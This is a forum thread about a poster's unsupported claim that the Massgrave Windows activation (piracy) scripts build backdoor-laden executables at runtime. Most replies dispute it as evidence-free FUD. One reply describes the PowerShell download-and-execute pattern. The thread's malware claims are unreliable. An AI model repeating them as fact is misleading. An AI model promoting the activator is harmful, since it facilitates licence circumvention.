There is a potential BYTECODE virus in the “OPEN SOURCE” Microsoft products MAASGRAVE activator. Here is how the virus is hidden and created AT RUN TIME!
https://github.com/massgravel/Microsoft-Activation-Scripts
I ran the MASSGRAVE “open source” activator on a virtual machine using VMware Workstation. The “open source” code actually also contains “BYTECODE” sections. WHEN YOU RUN THE “HARMLESS LOOKING open source” script, IT basically constructs several virus exe files during runtime FROM THE BYTECODE SECTION !!
TSforge_Activation.exe" TSforgeCLI.exe LibTSforge.dll
These exe files are what does the activation. It also installs backdoors, and potential malware !!
Can some other developer verify this on a virtual machine?
Please spread this message to more advanced Software engineers who understand “BYTECODE” HIDING and exe construction IN OPENSOURCE SCRIPTS AND HAVE THEM TAKE A LOOK AT IT! Also the first method makes you trust a their website! You don’t know what you are downloading from them!
I tried to post this Redit, but Redit is blocking this!
spoiler
IT basically constructs several virus exe files during runtime FROM THE BYTECODE SECTION !!
what kind of viruses? what do they do? did you notice anything objectively bad that they do? or something fishy other than creating executables?
These exe files are what does the activation. It also installs backdoors, and potential malware !!
could you provide a little more details on what kind of backdoors does it install? and what malware?
this could be a big deal, but you didn’t provide anything that could be verified.
Dude, even Microsoft engineers use/trust that script. Why do you think it’s still up on GitHub?
What you’re saying here may be a valid concern, I don’t know. I gotta say though, the way you’re presenting it discourages people from taking you seriously.
The dramatic language, exclamation points everywhere, the OVERUSE of ALL CAPS for EMPHASIS and so on makes this feel like some Qanon nonsense from Aunt Karen, and the eyes glaze over very quickly while trying to decipher it.
Just a friendly note for future posts, you can take it or leave it.
Starting line 6040 the Constants class. That isn’t bytecode, those are binary blobs that look like licensing/hardware identifiers. Given those byte arrays are named for HWID and KMS that would make sense. They also are also only being used for versioning calls for KMS4k (Key Management Service). There isn’t anything suspicious about that.
Sounds like FUD to me.
Tough audience here, huh?
Have you tried checking what the bytecode does? Maybe it’s just a way to block detection by Microsoft and antivirus programs, by creating a different binary every time. Just because something isn’t written in a high level language doesn’t mean it’s malicious. But it may be.
The IRM command in PowerShell downloads a script from a specified URL, and the IEX command executes it.
Always double-check the URL before executing the command and verify the source if manually downloading files.
Be cautious, as some spread malware disguised as MAS by using different URLs in the IRM command
Are you positive that you downloaded the correct files?
https://massgrave.dev/blog/tsforge
Here is what tsforge does.
I love posts like these. I have no idea what I’m reading half the time, but whatever they’re doing sounds interesting!
Do you have any actual evidence of this malicious code besides writing with your caps lock on? Frankly, this reads like some poorly-veiled astroturfing to sew distrust in what, as far as I can tell, is the most popular windows piracy tool.
Ok, so what “back doors” does it install?
Claims without evidence are just that - claims. I see nothing you’ve posted to be evidentiary.
That said, there is potential for malicious behaviour, but let’s not go off half-cocked on this.
Please spread this message to more advanced Software engineers who understand “BYTECODE” HIDING and exe construction IN OPENSOURCE SCRIPTS AND HAVE THEM TAKE A LOOK AT IT!
I believe chain letter is the word?
